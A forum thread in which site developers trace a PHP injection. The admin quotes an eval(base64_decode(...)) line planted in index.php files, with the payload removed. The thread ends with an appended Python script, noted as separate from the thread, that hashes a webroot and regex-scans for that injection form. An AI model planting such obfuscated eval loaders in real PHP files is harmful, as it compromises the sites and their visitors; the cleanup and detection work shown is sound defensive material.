Site Error messages?

snowdrop
developer
Posts:798
Joined:Mon Feb 01, 2010 15:25
Location:Sweden

Post by snowdrop » Sun Jan 08, 2012 15:33

Could everyone that gets some kind of site error messages please tell me where you get them and paste a copy of the message in here?

There are reports that we have issues (again, of course, this never ends..) with the site and that it throws some error messages at the header. Thing is I can't reproduce them myself.
Q_x
developer
Posts:334
Joined:Thu Sep 23, 2010 15:10

Re: Site Error messages?

Post by Q_x » Sun Jan 08, 2012 15:39

[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4586: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4588: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4589: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4590: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)

trying to open http://www.wtactics.org/forum/ on chromium (Srware Iron 15.0.900.2 (Build 107001 Windows))

Also http://wtactics.org/wiki/ displays a blank page, while http://wtactics.org/wiki/index.php?title=Main_Page seems to be working fine.
I'm the filthy bastard you wish you never met.

Re: Site Error messages?

Post by snowdrop » Sun Jan 08, 2012 18:07

The following script was injected:

 eval ___this_was_put_here_by_snowdrop___ (base64_decode('[base64 payload removed]'));

It seems only the index.php files were injected. They have all been cleaned and reuploaded, so stuff should work now. It is however just a matter of time before this hits us again, as I am clueless as to what backdoor it uses.

Re: Site Error messages?

Post by snowdrop » Sat Jan 21, 2012 16:36

Problem is yet to be found: Cleansing all files doesn't help, the worm gets back there directly after I upload a fresh copy of the files, suggesting there is either some unsafe script/plugin or a file with the payload somewhere lurking on the site.

This all takes immense amounts of time. I have wasted over 20 hours so far on reading about script injections and searching for what might cause it, looking at plenty of PHP and JS files, done many search and replaces, updated timthumb scripts and plugins in general, trying to decipher access logs etc., all with no success.

I even paid for a hoax service that was the biggest waste of money in my life - sitelock.com - that would supposedly identify and scan for viruses etc. but was so mediocre I feel obligated to warn anyone in here against ever using that company for anything that free services wouldn't do anyway.

The way I started doing it now is to kill all files in /public_html and upload the scripts/sites again, one by one, waiting to see if it gets infected. If it doesn't, I will then upload another one. Eventually the sites will all get infected, and the scripts I uploaded the most recently would supposedly be the bad ones.
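
An added example, not part of the thread or of the site's own code: one way to make the upload-and-wait procedure described above measurable is to hash the webroot right after a clean upload, then compare later to see which files changed or appeared, and to flag the eval(base64_decode( form quoted earlier. The function names, file names and the temporary webroot are assumptions made for illustration.

```python
import hashlib, os, re, tempfile

# The injected form quoted in this thread: eval(base64_decode('...'))
INJECT_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)

def walk(root):
    """Yield (relative path, file bytes) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                yield os.path.relpath(path, root), fh.read()

def snapshot(root):
    """Map relative path -> SHA-256; take this right after a clean upload."""
    return {rel: hashlib.sha256(data).hexdigest() for rel, data in walk(root)}

def compare(baseline, current):
    """Return sorted (modified, added, removed) paths since the baseline."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added, removed = set(current) - set(baseline), set(baseline) - set(current)
    return modified, sorted(added), sorted(removed)

def find_injected(root):
    """Return sorted (path, line number) of the first matching line per .php file."""
    hits = []
    for rel, data in walk(root):
        if rel.endswith(".php"):
            for lineno, line in enumerate(data.splitlines(), 1):
                if INJECT_RE.search(line):
                    hits.append((rel, lineno))
                    break
    return sorted(hits)

def write(root, rel, text):
    with open(os.path.join(root, rel), "w") as fh:
        fh.write(text)

def demo():
    """Constructed webroot: baseline, simulated reinfection, then the report."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "forum"))
        write(root, "index.php", "<?php\necho 'ok';\n")
        write(root, os.path.join("forum", "index.php"), "<?php\necho 'ok';\n")
        baseline = snapshot(root)
        # Constructed stand-in for the injected line; the payload is an inert placeholder.
        write(root, "index.php", "<?php eval(base64_decode('UExBQ0VIT0xERVI=')); ?>\n<?php\necho 'ok';\n")
        write(root, "cache.php", "<?php // file that was never uploaded by the admin\n")
        return compare(baseline, snapshot(root)), find_injected(root)
```

The hash comparison is the stronger signal of the two: it also reports files that were added or altered without containing the literal pattern, and a modification time on a changed file gives a window to search in the access logs.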